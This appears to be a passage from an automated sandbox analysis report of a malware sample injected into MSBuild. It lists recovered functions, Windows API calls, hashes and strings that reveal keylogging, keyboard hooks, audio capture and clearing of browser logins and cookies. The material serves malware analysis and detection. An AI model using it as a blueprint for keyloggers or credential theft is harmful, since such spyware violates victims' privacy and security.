                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                • String ID:
                                                • API String ID: 3360349984-0
                                                • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                • API String ID: 3472027048-1236744412
                                                • Opcode ID: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                • Opcode Fuzzy Hash: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQuerySleepValue
                                                • String ID: @CG$exepath$BG
                                                • API String ID: 4119054056-3221201242
                                                • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                  • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Window$SleepText$ForegroundLength
                                                • String ID: [ $ ]
                                                • API String ID: 3309952895-93608704
                                                • Opcode ID: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                • Opcode Fuzzy Hash: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandlePointerWrite
                                                • String ID:
                                                • API String ID: 3604237281-0
                                                • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                • Opcode Fuzzy Hash: bac99735e7dd953dd7de7a25bc7a472b089e844b0a047387f9cea53258e5f848
                                                • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                • Opcode Fuzzy Hash: 48cf3eaabf7ece0113a3c008fb104be432a4ec3be30a454fc0a72fbc2683693e
                                                • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                  • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                  • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                • String ID:
                                                • API String ID: 737400349-0
                                                • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B647
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B66C
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B67A
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandleReadSize
                                                • String ID:
                                                • API String ID: 3919263394-0
                                                • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MetricsSystem
                                                • String ID:
                                                • API String ID: 4116985748-0
                                                • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                Function 0041B37D Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleOpenProcess
                                                • String ID:
                                                • API String ID: 39102293-0
                                                • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountEventTick
                                                • String ID: >G
                                                • API String ID: 180926312-1296849874
                                                • Opcode ID: ed7abf5ed144e69c3d2872f5d5d6cab4558b4505d3eee695e95c0055fa3f6914
                                                • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                • Opcode Fuzzy Hash: ed7abf5ed144e69c3d2872f5d5d6cab4558b4505d3eee695e95c0055fa3f6914
                                                • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Info
                                                • String ID: $fD
                                                • API String ID: 1807457897-3092946448
                                                • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: ACP$OCP
                                                • API String ID: 0-711371036
                                                • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                Strings
                                                • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocalTime
                                                • String ID: KeepAlive | Enabled | Timeout:
                                                • API String ID: 481472006-1507639952
                                                • Opcode ID: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                • Opcode Fuzzy Hash: 4fbf8cc4982cbc942d3db3f2afc9c4eacdcd9657b35503fb3d66e7a76927aef2
                                                • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                Function 0041A686 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocalTime
                                                • String ID: | $%02i:%02i:%02i:%03i
                                                • API String ID: 481472006-2430845779
                                                • Opcode ID: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                • Opcode Fuzzy Hash: 49072da793dd1067c8c4d4b952bdc095bcf71ad5a1237c39b773f575b27685be
                                                • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                Function 00419E89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExistsFilePath
                                                • String ID: alarm.wav$xIG
                                                • API String ID: 1174141254-4080756945
                                                • Opcode ID: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                • Opcode Fuzzy Hash: a83789ed06d4bd6bc78d9f5caa1c4ae1948ed669f67617dd6d77616b3b752c21
                                                • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                • String ID: Online Keylogger Stopped
                                                • API String ID: 1623830855-1496645233
                                                • Opcode ID: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                • Opcode Fuzzy Hash: a471bc76fffd1fbac32a3585e4c4fab67e2de2ee53134a9f9046e82175b62acd
                                                • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wave$BufferHeaderPrepare
                                                • String ID: T=G
                                                • API String ID: 2315374483-379896819
                                                • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                Function 00447790 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LocaleValid
                                                • String ID: IsValidLocaleName$j=D
                                                • API String ID: 1901932003-3128777819
                                                • Opcode ID: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                • Opcode Fuzzy Hash: 724f10c09d6576eb41aa8f51452c5d432ff136580ab4b9325f7f83eb90576703
                                                • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: H_prolog
                                                • String ID: T=G$T=G
                                                • API String ID: 3519838083-3732185208
                                                • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                  • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                  • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                  • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                • String ID: [AltL]$[AltR]
                                                • API String ID: 2738857842-2658077756
                                                • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
